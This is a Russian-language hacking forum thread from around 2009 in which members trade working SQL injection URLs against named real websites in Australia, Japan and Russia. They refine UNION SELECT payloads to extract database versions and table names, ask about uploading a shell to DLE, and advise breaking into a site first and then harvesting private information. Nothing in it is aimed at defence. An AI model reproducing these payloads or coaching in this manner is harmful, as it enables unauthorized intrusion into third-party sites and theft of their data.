Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    Code:
    http://www.oceanworld.com.au/page.asp?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
    выводиться поле 2, при попытки вместо 2 написать version() или user() - ошибка

    vesion(): mysqld-5.0.18-nt

    Code:
    http://www.oceanworld.com.au/page.asp?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables--
    как сделать вывод???
     
  2. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    http://www.oceanworld.com.au/page.asp?id=-8+union+select+1,unhex(hex(version())),3,4,5,6,7,8,9,10,11,12,13,14--

    Одно и тоже на каждой странице темы=\
     
    6 people like this.
  3. FunkFan

    FunkFan New Member

    Joined:
    7 Jan 2009
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    А можно ли счесть за уязвимость то что когда регишься на сайте тот логин который ты ввёл будет отоброжаться в ссылке так www.site.ru/users/твойлогин ?
     
    #4483 FunkFan, 8 Jan 2009
    Last edited: 9 Jan 2009
  4. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    FunkFan, наврятли.
     
  5. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    нету вывода? (

    и вот еще как составить правильный запрос к бд postgre?
     
    #4485 sabe, 8 Jan 2009
    Last edited: 8 Jan 2009
  6. _evgeniy_

    _evgeniy_ Member

    Joined:
    7 Sep 2008
    Messages:
    25
    Likes Received:
    11
    Reputations:
    5
    на первом кажет нету инекций

    второй
    Code:
    http://www.glassfactory.co.jp/shop/detail.php?id=-5+union+select+TABLENAME+from+PG_TABLES+LIMIT+1+OFFSET+1--
    есть такая тема
     
    1 person likes this.
  7. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    sabe

    первый

    http://shop.m-matching.jp/chara/prd_detail.php?ID=10001060999999999999+union+select+1,2,3,4,version(),null,null,null,null,111,1212,13,14,null,null--

    второй так вывод лучше :)

    http://www.glassfactory.co.jp/shop/detail.php?id=-5+union+select+1,null,TABLENAME,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+PG_TABLES--

    Обе PostgreSQL
     
    1 person likes this.
  8. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    _evgeniy_
    есть скуль..

    второй спасибо)

    jokester
    как всегда ты на высоте))))
     
  9. RekRut

    RekRut Elder - Старейшина

    Joined:
    27 Feb 2006
    Messages:
    116
    Likes Received:
    26
    Reputations:
    0
    помогите раскрутить ,
    в запросе походу идет фильтр на все что только можно, почти

    http://www.myreductil.com/buynow.php?pack_id=-1%20union%20select%201,22-2,333,4444,55,6,7,8,99,23,11,12,13,14,15,16,17%20from%20products/*

    умножение сложение в некоторых колонках работает , а вот банальный вывод версии мускула никак не проходит , гляньте кто шарит плиз?
     
  10. #Wolf#

    #Wolf# Elder - Старейшина

    Joined:
    26 Mar 2008
    Messages:
    375
    Likes Received:
    166
    Reputations:
    16
    есть какие нибудь предположения по заливке шелла в dle 7.2/7.3
    извините если не по сабжу
     
    2 people like this.
  11. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Скобки ему не нравятся
    http://www.myreductil.com/buynow.php?pack_id=11+and+1=2+union+select+1,22,3,4,5,6,7,8,9,0,11,@@version,13,14,15,16,17/*
     
    4 people like this.
  12. ^YaHoo^

    ^YaHoo^ Banned

    Joined:
    2 Jan 2009
    Messages:
    22
    Likes Received:
    26
    Reputations:
    0
    Здравствуйте расскажите мне пожалуйста про эту штуку Blind SQL/XPath injection http://l2just.net/index.php?login=submit+and+31337-31337=0+--+&login_name=root&login_password=%2E%2E%2E%2E%2E%2E а что дальше делать незнаю помогите пожалуйста!
     
  13. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    http://www.museum.ru/gmii/news.asp?id=-1%27
    Ну не понимаю я как с MSSQL работать. Мб помогете.
    тиц 13000 PR 5
     
    1 person likes this.
  14. ^YaHoo^

    ^YaHoo^ Banned

    Joined:
    2 Jan 2009
    Messages:
    22
    Likes Received:
    26
    Reputations:
    0
    вот нашел Blind SQL/XPath injection http://l2just.net/index.php?login=submit+and+31337-31337=0+--+&login_name=root&login_password=%2E%2E%2E%2E%2E%2E что дальше делать непойму скажите плз!
     
  15. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    как узнать какая OC стоит вместе с сайтом?(сайт известен)
     
  16. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    В MySQL существуют системные переменные:

    @@basedir
    @@datadir
    @@tmpdir
    @@version_compile_os


    последняя - ось
     
  17. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    мм... не понял, доступа к MySql у мя нету, мне известен токо сайт а самого доступа нет
     
  18. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    us, вообще-то это приватная инфо, которая равносильна знанию (а может и покруче) version() при sql-inj. Вывод - сначала надо сайтик заломать, потом получать приватную инфо и наслаждаться рез-тами

    ЗЫЖ Раздел вроде как "Уязвимости называется" - уязвимости, ведущие ко взлому, получению приватной инфы, дальше делай выводы сам:) Удачи

    В данном случае эта инфа тебе поможет только если ты нашел sql-inj на сайте, подобрал кол-во колонок и узнал хотя бы version() БД
     
  19. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    diznt
    nmap -0 или любой сканер,способный на это, или снятие баннеров, или просто тупо вбей
    site.ru/index.php
    site.ru/index.PHP
    винде пофиг на регистр, или по ошибкам, всякое бывает, это вобщем целая история.... способов куча
     
  20. 4adr0s

    4adr0s Elder - Старейшина

    Joined:
    14 Dec 2007
    Messages:
    75
    Likes Received:
    11
    Reputations:
    0
    diznt, пусть браузер выдаст окно ошибки, внизу увидишь название системы, версию сервера и т.п., но не факт, что все - истина
     
Thread Status:
Not open for further replies.